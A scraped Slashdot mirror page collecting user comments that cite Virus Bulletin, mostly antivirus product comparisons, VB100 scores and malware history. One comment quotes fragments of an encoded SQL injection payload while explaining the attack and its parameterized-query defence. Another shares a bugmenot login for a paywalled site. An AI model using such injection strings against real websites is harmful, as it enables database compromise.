Slashdot Mirror

I think the reason reverse engineering is forbidden is because of Intel's new DRM scheme:

https://www.virusbtn.com/virus...

Which by the way, among other things, this new DRM scheme would also allow malware to completely hide itself from not only AV software, but you as well. And in a perfect world (i.e. if SGX works as intel plans) nobody would be able to remove any malware that uses this.

The bypass allows at network-level remote attacker to inject executable code (a dylib) into a legitimate download (.dmg/.zip) without it being detected. When the user goes to run their download - the injected unsigned code is then also executed. IMHO Gatekeeper should block that -so yah its a Gatekeeper bypass not a remote code execution vulnerability. The RSA slides are somewhat short on details ([PDF] https://s3.amazonaws.com/s3.sy...) - for full technical details see: [PDF] https://www.virusbtn.com/pdf/m... (page 15+ describes the Gatekeeper bypass).

There's a lot of people saying Microsoft Security Essentials or Windows Defender. That was a great answer a few years ago, it's not now. It's near the bottom of of the lists in rankings on most tests. For those saying don't use any AV, stop posting please. You're not impressing anyone by trying to be l33t prosauce internet surfer. http://www.av-comparatives.org... http://www.av-test.org/en/anti... https://www.virusbtn.com/vb100... http://www.tomsguide.com/us/be... http://www.lifehacker.co.uk/20... Nowhere on ay of those links will you find someone saying that MSE/Defender is a good choice.

• We Live Security blog - Back in BlackEnergy: 2014 Targeted Attacks in Ukraine and Poland
• 2014 Virus Bulletin Conference - Last-minute paper: Back in BlackEnergy: 2014 targeted attacks in the Ukraine and Poland and YouTube video of the presentation
• We Live Security blog - CVE-2014-4114: Details on August BlackEnergy PowerPoint Campaigns
• Virus Radar - description of Win32/Rootkit.BlackEnergy.AA

Hope this is information is useful to anyone who might be concerned they have compromised hosts on their network.

Regards,

Aryeh Goretsky

There is no way for anybody outside of Google to know whether the original claim is correct or not.

That's not quite true actually. VirusBulletin is a third party spam filtering company that made a blog post stating that based on their own measurements, Gmail was indeed dramatically better at stopping hijackings than other providers.

The code snippets have too many colors which in my opinion make them hard to read. What do you think?

They can't keep up with the known threats

Comparative reviews since February 2009 - February 2014

Out-maneuvered by new threat vectors

Outmaneuvered at Their Own Game, Antivirus Makers Struggle to Adapt

Conventional security software is powerless against sophisticated attacks like Flame, but alternative approaches are only just getting started.

Some of them even get it, Eugene Kaspersky admits :

The contemporary antivirus industry and its problems

http://www.virusbtn.com/vb100/RAP/RAP-quadrant-Oct12-Apr13-12.jpg

There is a chart of recent AV comparative effectiveness tests done by independent labs. Microsoft scored somewhere around 75% effectiveness for "Proactive" (real-time) protection. The best one on that chart for free appears to be Avira.

Here's a link to Virus Bulletin for a comparison of free and paid packages. I'd also recommend a multi-tiered strategy of OpenDNS and and a hosts file to block bad sites, MalwareBytes to scan and check for malware (paid version provides real-time protection), and I also use Tracking Protection Lists. Takes all the joy out of it, doesn't it.

The original Windows Security Essentials was a well regarded AV program, but 2.0 has a very low detection rate and shouldn't be used.

Virus Bulletin rates programs by platform and has a top 100. I was surprised that a free version (Avira) is one of the best.

Here is a great overview of the technique that was used:

http://www.virusbtn.com/pdf/conference_slides/2009/Maciejak-Lovet-VB2009.pdf

While they are targeting IIS and MSSQL the real issue is developers that don't sanitize the parameters that get sent to the database. The SQL is encoded in at least 2 different layers, so the only keywords that appear in the URL are ;dEcLaRe%20@s%20vArChAr(8000) and ;EXEC%20(@S); and It would be pretty difficult for Microsoft to block those without affecting legitimate usage. If you are using LINQ, Stored Procedures, or Parameterized Queries based on SqlCommand then this wouldn't work against your site or library. Mainly queries created as raw text strings have this vulnerability, and in this case it appears that some library or module used by a number of sites used raw SQL strings instead of the best practices recommended by Microsoft and every other SQL and web server vendor.

And according to Virus Bulletin, they're one of the worst for proactive detection and about average for reactive detection.

It's never good to only use a single source for these things.

is there a way to evaluate antivirus software? i mean, after it's 1.) no popups, 2.) not bloaty 3.) easy on the system 4.) convenient to use... how do you know if it actually works?

There are sites that test AV products, two are:

Virus Bulletin and AV-Comparatives.

These can be used to get an idea of the effectiveness of the product. As for 1, 2, 3 and 4 just trying the product will tell you about it. If one of those issues causes problems, discard the AV product and get another, this goes especially for the "easy on the system" requirement.

I check the scored on Virus Bulletin http://www.virusbtn.com/vb100/archive/results?display=summary and AV Comparitives http://www.av-comparatives.org/images/stories/test/summary/summary2009.pdf to get the best available. I have used Avast! for years with great success, and recently started using Microsoft Security Essentials, both of which are VB100 rated. I like the small footprint of the new MS offering, and the fact that it has such a high detection and low false-positive rating. So far so good, even on my in-laws' laptop.

Hello,

What Dr. Jakobsson has described is a reputation system.

At Virus Bulletin 2009, Symantec gave a presentation on reputation systems: " Using the wisdom of crowds to address the malware long tail ," which cited data from one that began development in 2006. While I do not claim to understand the system, in a nutshell, it seems to work by generating a hash for files after they are downloaded or when they are to be executed, and sends this to Symantec along with some metadata, such as source IP/host, filename, path specification on the local host, date and time stamp on the file and other useful information, which is sent to Symantec, initially to provide a quick lookup, but more information can be sent if additional analysis is required. Symantec's client software can then display a message saying "Program XYZ.EXE has been seen n time(s) over the course of n day(s)/week(s)/month(s)." along with some suggestions about how safe it is likely to be based on new/unique program files more likely to be untrusted (higher potential for malcode) and older, commonly program files having a higher degree of trust.

One advantage of this approach is that it quickly allows malcious files encoded using server-side polymorphism to be quickly identified, as well as the sites hosting them. This negates the technique used by the bad guys to constantly modify code to in order to escape detection by anti-virus software.

Regards,

Aryeh Goretsky

Hello,

What Dr. Jakobsson has described is a reputation system.

At Virus Bulletin 2009, Symantec gave a presentation on reputation systems: " Using the wisdom of crowds to address the malware long tail ," which cited data from one that began development in 2006. While I do not claim to understand the system, in a nutshell, it seems to work by generating a hash for files after they are downloaded or when they are to be executed, and sends this to Symantec along with some metadata, such as source IP/host, filename, path specification on the local host, date and time stamp on the file and other useful information, which is sent to Symantec, initially to provide a quick lookup, but more information can be sent if additional analysis is required. Symantec's client software can then display a message saying "Program XYZ.EXE has been seen n time(s) over the course of n day(s)/week(s)/month(s)." along with some suggestions about how safe it is likely to be based on new/unique program files more likely to be untrusted (higher potential for malcode) and older, commonly program files having a higher degree of trust.

One advantage of this approach is that it quickly allows malcious files encoded using server-side polymorphism to be quickly identified, as well as the sites hosting them. This negates the technique used by the bad guys to constantly modify code to in order to escape detection by anti-virus software.

Regards,

Aryeh Goretsky

Virus Bulletin unbiased enough?

Dunno if they have a more recent test, that's the one I had bookmarked. I get about the same results in my tests, btw.

Don't see anything from the VB100 list yet. http://www.virusbtn.com/index

According to a (not so terribly old) VirusBulletin comparison, Avira seems to be the company du jour.

The crackers themselves are generally cool, I will agree, but there are some corners of the Internets that can get your PC in some seriously obnoxious shit if you aren't careful.

For example, you can read about this bit of nasty code that's distributed through image links on Warez sites. (I believe a free, painless registration is required to read the full article)

Basically, PC gaming is so massively unappealing at this point to me not because I need the latest hardware or to fiddle with drivers, but because I can't stand the copy protection on retail (packaged) games and what they might be doing to my PC, I can't tolerate Steam and its reliance on servers I may or may not have access to when I want to play, or cracked games, with the disturbing implications for PC security that come from non-official packages. Those three things don't leave me with a whole lot of options, especially since I hate console game control systems.

I fucking just LOVE it when people post "information" which is not backed up by any source or link or anything.

http://www.virusbtn.com/news/2008/09_02

Here are the latest results I could find. Note that AVG is NOT the worst by far. The free version only suffers in it's lack of detection for malware but the GP did not say the the free version was installed. Now Avira comes out smelling like a rose in these tests so of course they are recommended but AVG is also very good.

Unfortunately I may not make recommendations. But McA is about the worst when it comes to resource hogging.

What I may do is link to test pages. Take a look at http://www.virusbtn.com/news/2008/09_02 and act accordingly. ;)

We use Kaspersky for Windows systems at work (and ClamAV on Linux for mail, though that might change to Kaspersky as I believe we have a license for it). When employees ask if they can use our licenses for their personal machines, I point them at Avira AntiVir because it's about as good and it's FREE FOR PERSONAL USE (although the free version has less spyware detection). It blows AVG out of the water.

Here are some useful links from my research, which included the above site:

• Wikipedia:Antivirus software's external links are very useful.
• Top 9 Windows Antivirus, a review at About.com, ranking Avira, Kaspersky, BitDefender, and McAfee as #1, 2, 3, and 4 respectively.
• Virus.gr measured detection rates of tweaked settings, ranking in order: G DATA, F-Secure, TrustPort, then Kaspersky.
• AntiVirus Software Review 2009 - TopTenREVIEWS, ranking in order: BitDefender, Kaspersky, ESET, then AVG.
• Virus Bulletin's latest test results (no direct ranking).

From the Wikipedia links and other research that I didn't bother to note to my colleagues (who were also doing this research), I determined that Kaspersky's software was among the most efficient and CPU-friendly. It's only downside was a less-than-optimal user interface, especially on the administrative side for the corporate product. We didn't mind its UI flaws in the free trial period, so we purchased it. We're still happy with it several months later.

The main arguments for our switching from Trend Micro were that it was slow, had poor performance, missed several viruses, we wanted to boycott it, and we were tied to a very old version (since it out-performs the newer ones in reviews). Arguments for switching to Kaspersky included: it doesn't feel bloated (remember when that was the norm?), great performance, well received across the board in reviews, dirt cheap (new licenses are 70% the current renewal cost of Trend Micro, which is an ever-growing target), we liked the UI that prevented reviewers from giving it a perfect score, and it's the de-facto number one scanner in Russia and surrounding area (you know, where all the viruses come from?). Kaspersky is also growing rapidly in deployments; you can now get computers installed with it.

You can check some of the ones listed at http://www.virusbtn.com/news/2008/09_02, which also qualifies them a bit!

I personally use Avira AntiVir and like it! I started with the free edition but quickly upgraded, it's pretty cheap and might as well support them...

So supposing money isn't an issue, what do you recommend?

Not the "usual suspects" (McAfee and Symantec), they're resource hogs. I used F-Prot for years and found it to be resource-light and good at detection but not always at removal. I find NOD32 a PITA to install on client machines but haven't used it extensively myself (and probably wouldn't, just because it's so obnoxious to install). I really liked AVG before 8.0, though I had stopped using it because once every few weeks it would break doing an update, and the only way to make it work again was to uninstall and reinstall it (haven't noticed anyone else having that problem, so it's probably unique to my particular configuration).

At the moment, I rather like AVira, and it scored very well in recent AV-test.org tests. (For whatever credence one gives such tests, the rankings ebb and flow from quarter to quarter.) But pay or free, IMHO the main things are that the program that doesn't bog the machine down (especially important if you, like me, tend to run less than state-of-the-art hardware), and that the user interface not be too annoying. Most of the programs are adequate at stopping viruses, so it's not that big a deal which one you use so long as it updates regularly.

Not really; sites such as av-test.org and virus.gr are constantly testing malware detection, and while coverage is spotty on average, the products do tend to keep pace with new malware.

What good points? It has a resource intensive "shiny" interface. It has levels of DRM heretofore unseen in an operating system. It is claimed that it is secure, yet still has gaping security holes. It is claimed that it is safe, yet has to be made un-safe for users to be able to do anything with it. It is expensive, clunky, space consuming, privacy invading, insecure, unsafe, and is more interested in protecting the interests of major Hollywood distributors than its users.

Care to highlight why I'd want to use Vista?

Hello,

I think it is a bit disingenuous to say that the reason some of the tested programs failed to receive a VB100 award had anything to do with changes to the test procedures used by Virus Bulletin Magazine. The tests consist of ItW (In The Wild), macro, polymorphic, file infector virus "zoos," with ItW and macro tests being repeated for both scheduled on-demand scanning and on-access (file I/O wedge) scanning, plus a set of clean files which are used to test for false positives. You can view information about the test sets here on Virus Bulletin's web site.

The tests performed are basically those of detection (or lack of detection in the case of the false positive set—remember, a false positive report can be just as damaging to productivity in a corporate environment as an actual viral outbreak), along with some sometimes-snarky comments about the program being tested (usually related to usability issues). The VB100 award means that a product passed the ItW and false positive tests; it could still have faired poorly on the other tests and received the award.

The idea that you can somehow "optimize" a product for these tests is a bit silly; ItW viruses are the ones which affect a vendor's customers and their technical support department receive calls about all the day. The idea that a vendor was somehow not concentrating their detection efforts on these is ludicrous; the ability to handle these types of threats is how they generate their revenue. As for avoiding a false-positive report against a clean set, well, I cannot think of a practical way to engineer a virus scanning engine's signature database for that.

Computer Associates and Symantec received VB100 awards in this test and they are enterprise vendors, so claiming that the "major vendors missed it" this time around is incorrect. Conversely, vendors which specialize in anti-malware like Norman did not receive a VB100 award this time around. While there may be some correlation between the size of a vendor and their detection rate, I do not know if it is as linear a mapping as you imagine.

Regards,

Aryeh Goretsky

Hello,

I shared my thoughts on this over here on Neowin.Net's forums, so I really don't just want to do a cut-and-paste job and post what I wrote in verbatim here.

This is one of the first of a series of comparisons to include Microsoft Windows Live OneCare that Virus Bulletin Magazine has been doing for many years. While I suspect it is more frustrating than embarrassing at this point for the team responsible for Microsoft's Windows Live OneCare, this is really Microsoft's first attempt at providing their own comprehensive anti-malware solution—MSAV, the product which shipped with DOS does not count, it was licensed from Central Point Software (who was later acquired by Symantec) who, in turn, had licensed the software from Carmel Software—and it is going to take some time and lots of signature release cycles in order to get their detection rate fine-tuned.

I don't expect this first Virus Bulletin product comparison to be the last, and the question really isn't how Microsoft did this time: It is how their product does over the next year or two that matters. If it gets worse or stays the same, they are just another competitor in the space (albeit the one with the deepest products). If, however, their detection rate improves, it is going to make it just that much more difficult for their competitors to compete against them.

As a disclaimer of sorts, I should mention that happen I work for one of the computer security companies that Microsoft competes against with this products, so this dicussion is far from academic for me. Frankly, though, I'm not expecting Microsoft's entry into this space to have any effect on my employer—we are good at what we do and have a very loyal customer base. Also, we tend to compete against other, similarly-sized companies in the field. What I do worry about, though, is how some of my friends and colleagues at the largest companies are going to handle Microsoft's entrance as they are going to be competing head-to-head against Microsoft for marketshare.


Regards,

Aryeh Goretsky

At the end of the day, until we all stop using the same operating system, we're doomed to a continual barrage of large-scale infections (remember the Irish potato famine?)

AVG may run fast, but I've found that its not quite as good as other (non-free) products at catching viruses

Virus Bulletin (BugMeNot Required) does tests of about 30 different antivirus programmes on various versions of windows from NT4 to Server 2003.

They set up computers with the various AV software, and infect the computers with currently common viruses and see which ones catch them. The resuls of 44 of these tests since 1998 for some of the major AV programmes are as follows;


Passed/Failed/NA

Symantec 30/7/7
McAfee 24/18/2
F-Secure 21/12/11
AVG 11/21/12

and the one that I used to use when I ran windows (partly as a result of these tests)
Eset passed 36, failed 3, 5 N/A

AVG is improving, but it still fails these tests periodicly. A few years ago, I would have called recommending AVG downright irresponsible, it had only passed 1 out of 20 tests by Feb 2003

You should really check out Eset's Nod32 http://www.nod32.com/home/home.htm and their success rate on Virus Bulletin (the de-facto standard in AV testing) http://www.virusbtn.com/vb100/archive/results?vend or=VE14
login&passwd: lazyboy05 (from bugmenot.com)

for a quick summary of VB 100% results for "major" AV vendors:
Eset (nod32): 36 Success / 3 Failure / 5 No Entry
Symantec: 30 Success / 7 Failure / 7 No Entry
Trend Micro: 13 Success / 7 Failure / 24 No Entry
Kaspersky: 31 Success / 13 Failure / 0 No Entry
McAfee: 24 Success / 18 Failure / 2 No Entry
Panda: 1 Success / 3 Failure / 40 No Entry
Alwil(Awast): 16 Success / 19 Failure / 9 No Entry
Grisoft(AVG): 11 Success / 21 Failure / 12 No Entry
F-secure: 21 Success / 12 Failure / 11 No Entry
Sophos: 31 Success / 12 Failure / 1 No Entry

Nod32 not only has the best detection engine, its the fastest AV too! ..sorry if Im too exited about this particular product, but it just wipes the floor with "the best" you've found. ..and all the other competition :))

Isn't this exactly what VGrep was designed to sort out?

Yes, I wondered about that as well. The CARO system has worked well for a long time now, and there have been a number of initiatives to regularise the virus naming taxonomy - I remember Jim Bates coming up with one in the 80s, which was all numeric!

The problem is that the researcher working on a virus has to name it very rapidly. Viruses are often varients of others, so you need expertise in name allocation - it can only be done by the researchers. I would have though that the CARO system had sorted out all the bugs by now. Perhaps the US Cert are just tagging on the coat tails of CARO?

Incidently, for anyone who wants to translate virus names from one product to another, the indistry tool of choice is VGREP, which can be found here - http://www.virusbtn.com/news/vb_news/2005/02_10.xm l

We are born with an immune-system. Computers are born with the equivalent to AIDS: Immune Deficiency Syndrome, but in their case it is ABSOLUTE Immune Deficiency Syndrome.

And there are a couple of gotchas in the parent's cosmology, it seems:

One doesn't know if one's system is infected just because one hasn't connected to the 'net "raw". . . ( if you want to "know" something, test it correctly )

Firewalls are circumventable ( i.e. have bugs, and such are exploited ).

Software is sometimes accidentally distributed already-infected ( Microsoft did it with one of their CDs, manufactured in an infected factory, IIRC ).

Using recordable media means ( if one exchanges information between systems, or between infected previous-install and current not-yet-infected install, for instance ) risk. . .

Etc.

And. . . Trusted Computing can also pertain to INDEPENDENT, INTEGRITY-DRIVEN comparative-reviews, eh?

Virus Bulletin used-to-have visible to anyone archives ( I think they changed that, some time ago ), and back-a-year-or-two ago it was Eset & Vet ( http://www.nod32.com/ and http://www.vet.com.au/ ) who were the ones to beat. Vet won if simplicity was a factor, as Eset apparently has one gazillion config microsettings
( and also, it wasn't possible to buy Eset online if one was running Linux, last time I tried: one HAD to be using MS-Windoze + MS Browser to buy it, but they apparently contracted-out their net-purchase-system, so it wasn't Eset that did that, it was whomever their contractor-company that enforced non-secure system to purchase Eset )

Anyways. . Oh! they've boshed privacy entirely! now one MUST register/login to view the awards at all, eh?

Ah well, they USED to offer good independent information to us, anyways. . .
Here's the only page it seems they allow anonymous reading of:
http://www.virusbtn.com/magazine/this_month/index. xml

if you've a throwaway e-mail address, maybe you can see if they're worth anything nowadays, on their "100% Award", which is an award given to all AV progs that defeat 100% of all the in the wild viruses they sic on 'em. . .

I've had good success with the latest AVG and having it installed for clients. Not outbreaks to speak of and its free to boot. AVG also passed the latest https://www.virusbtn.com/ test with 100% detection.

I used to use Avast but IMHO just gotten to the point where its too bloated. Scan every file accessed or downloaded and my email. Don't hook into every nook and cranny of my OS. Avast IMHO does a good job, its just way heavy on resources.

Either way both Avast and AVG are still better than norton which unfortunately can be found everywhere with of course a virus subscription that expired in June 2004. Sigh.

How is this different than writing a ksh or bash script virus? Ksh and bash script viruses can be just as bad. Heck, remember the Morris worm?

I like bashing M$ just as much as the next ./er, but this might not be their bad just yet.

http://www.virusbtn.com/vb100/archives/products.xm l?eset.xml

http://www.virusbtn.com/vb100/archives/products.xm l?symantec.xml

http://www.virusbtn.com/vb100/archives/products.xm l?eset.xml

http://www.virusbtn.com/vb100/archives/products.xm l?symantec.xml

Back in 1989, an individual sent out a mass mailing to many recipients. The mailing consisted of an envelope including a floppy disk and a license agreement in small print. The software on the disk provided an assessment about the user's risk regarding HIV/AIDS. (Supposedly, users were encouraged to install and run the software.) However, the software also contained a hidden mechanism. After a delay, the mechanism would encrypt and hide files on the user's system. The license agreement specified a license fee ($189 one-off or a $378 "lifetime license") for using the software. This payment was to be sent to a PO box in Panama for "PC Cyborg Corporation." In addition, the license agreement warned of "most serious consequences" for failure to pay the license fee. A file left by the software said that users who paid would receive a "renewal software package." The originator of the software was tracked down but was found unfit to stand trial. (See the "Virus: AIDS Diskette" entry on this page.)

Heise has just released a dire warning (and temporary treatment) from c't regarding ATA hard disk security passwords: There may be a gaping security hole in millions of computers that allows malware to lock the hard drives from their legitimate users. Some will remember what this means from extortionate trojan horses as early as 1989 (search for "Panama" - judicial outcome in 1995). Now factor in how some similar disaster, "supported" by firmware, could spread over the Internet rather than by postal mail today...

No offense. But it sounds like people are searching for things to dismiss this study.

It is more than right to check the validity of the study. And some googling suggests that Robert Ford dilapidates his scientific reputation for money. Being a self proclaimed Linux enthusiast there is little evidence to be found for that. But he closly works together with Microsoft:

From: http://www.virusbtn.com/conference/vb2004/programm e/

Gatekeeper II: new approaches to generic virus prevention Richard Ford, Florida Institute of Technology Matt Wagner, Microsoft Corporation Jason Michalske, Florida Institute of Technology

Doing talks together with Microsoft employees is certainly not a sign for his independence and Linux attachment.

IMHO he should immediatley be expelled from the Florida Institue of Technology.

Well, apparently this is the second time Microsoft has come out on top of a research project by Mr. Richard Ford.

http://www.virusbtn.com/magazine/articles/letters/ 2004/01_01.xml

Apparently there was some question to the validity of an earlier project because it was sponsored by Microsoft.

However, I would like to note that both researchers seem very well educated, especially in computer security. And, additionally, they both note that a lot more could be done to lock down the Linux server.

Here are some helpful resources on Virus Scanner tests if you can't decide which one to use:

http://www.virusbtn.com/vb100/archives/products.xm l?
http://www.pcworld.com/reviews/article/0,aid,11593 9,pg,5,00.asp

As I've stated before, whatever OS is the dominant one, is the one that virus writers will explore and find the exploits for. Already Symantec has ported to the Mac platform because of the growth it's realized lately. Virus writers are now beginning to attack it, (although not as much as Windows.)

And already the OSS community has been attacked by spyware. If this vulnerability, done by a JavaScript can effect Firefox on Unix, then any browser can be compromised.

Now, that said, I do believe that MS should not be charging for this software, but if they made one for free then the compition would thin out quite quickly. And a search of Virus Bullitin shows nothing on this company participating in any of there tests.

So, how good can it be?

As I've stated before, whatever OS is the dominant one, is the one that virus writers will explore and find the exploits for. Already Symantec has ported to the Mac platform because of the growth it's realized lately. Virus writers are now beginning to attack it, (although not as much as Windows.)

And already the OSS community has been attacked by spyware. If this vulnerability, done by a JavaScript can effect Firefox on Unix, then any browser can be compromised.

Now, that said, I do believe that MS should not be charging for this software, but if they made one for free then the compition would thin out quite quickly. And a search of Virus Bullitin shows nothing on this company participating in any of there tests.

So, how good can it be?

The definitive (and about ten-year-old) paper on this is:

http://www.virusbtn.com/old/OtherPapers/GoodVir/

Well worth a read if you've not seen it before

I remember looking for a replacement AV solution earlier this year. One of the products (NOT Norton) claimed to have this kind of predictive ability - detecting viruses not through signatures but by analysis. I think it was Kaspersky, but I'm not sure. (In the end, I decided to put off my decision.) I was looking at the AV products listed on Virus Bulletin, in case you want to find out which one ot was.

You can read a good rebuttal against the 'MONOCULTURE IS DEATH' argument here:

http://www.virusbtn.com/magazine/archives/200312/m onoculture.xml

written by someone who actually knows a little about malicious mobile code :-)

A really good troll makes every word in his sentence a link so that his point seems valid.

You don't even have to visit the sites, just google something like "linux vs windows", grab relevent links and include then in your post. No one will read them anyways, and believe you because you provided plenty of background Info and reputable sources (computing.net included!). They will have to believe your Pro-Windows rant.

Linux isn't a Toy OS. it's used by google. Who provided you this Informative post :)